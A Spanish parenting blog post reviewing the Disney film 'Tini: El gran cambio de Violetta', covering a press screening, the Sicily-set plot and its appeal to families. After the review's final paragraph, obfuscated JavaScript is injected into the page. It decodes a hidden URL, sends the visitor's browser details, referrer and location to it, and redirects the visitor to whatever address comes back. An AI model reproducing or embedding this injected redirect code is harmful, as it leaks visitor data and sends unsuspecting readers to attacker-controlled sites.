Violetta salta de la televisión al cine

Una de la cosas que una deja de hacer (al menos es mi caso) cuando tiene hijos es ir al cine, y cuando empieza a recuperar la costumbre no es para ver lo último de Almodóvar, Amenabar o Bayona, ¡qué va! Más bien recupera el hábito con títulos más cercanos a los gustos de los pequeños de la casa. Y aquí me acuerdo de mi amiga Bea (sus niños tienen ya 11 y 9 años), que me decía que muchas veces se dormía en la butaca de la sala porque las historias no le enganchaban y que era difícil encontrar alguna que le agradase.

La semana pasada estuve en un pase de prensa para periodistas invitada por Disney, donde nos presentaban uno de sus últimos títulos en llegar a la cartelera. Tengo que decir que me quedé muy sorprendida y bastante contenta con lo que vi, y lo que mis ojos vieron no fue otra cosa que Tini: El gran cambio de Violetta, la película salida de la famosa serie de televisión de Disney Channel. Para los que se estrenan como padres y madres puede que el nombre de Violetta no les diga nada, pero para los que tienen hijas con edades comprendidas entre los  8 y 14 años, Violetta es casi una más de la familia, porque durante las tres temporadas que la serie se ha emitido, esta joven argentina ha cenado con ellos casi a diario. Y como broche final a una serie mítica para muchas chicas, ahora se estrena la película que cierra un ciclo para el personaje y para la actriz. Por eso, a muchos padres —como es el caso de mi amigo Luis— no les va costar nada acompañar a sus hijas al cine, porque ellos mismos querrán saber cómo acaba esta historia, y tengo que decir, que no les a va decepcionar.

La película parte del momento en el que Violetta, la grandísima estrella de la música, toma una decisión que cambiará su vida: dejarlo todo y emprender un viaje interior que la llevará a conocerse a sí misma. Para ello abandona su ciudad natal y su vida glamurosa y se planta en Sicilia, en casa de Isabella, una amiga de la familia de siempre (¡sorpresa,  este papel está interpretado por la gran Ángela Molina). Allí hará nuevos amigos,  descubrirá qué quiere hacer con su vida, averiguará cosas de su pasado que nunca hubiese imaginado y sufrirá por su gran amor. La música y los bailes, tan característicos de la serie, serán un elemento importante en el transcurso de los acontecimientos, y ni qué decir que el momento final de la cinta se cierra con una escena muy musical. Pero quizás lo que más me gustó fueron los paisajes de este rincón del planeta y que tan bien ha sabido captar su director, Juan Pablo Buscarini: verdes montañas, mar azulado, rocosos acantilados, un pueblo teñido de naranja…

Son más de 90 minutos en los que las “reinas de la casa” perderán la noción del tiempo para reírse, enfadarse, sufrir o alegrarse con Tini, y en los que quizás, algunos de los mayores, como fue mi caso, derramará más de una lágrima con secuencias en las que el modo madre/padre se dispara. var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

2 comentarios en “Violetta salta de la televisión al cine

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *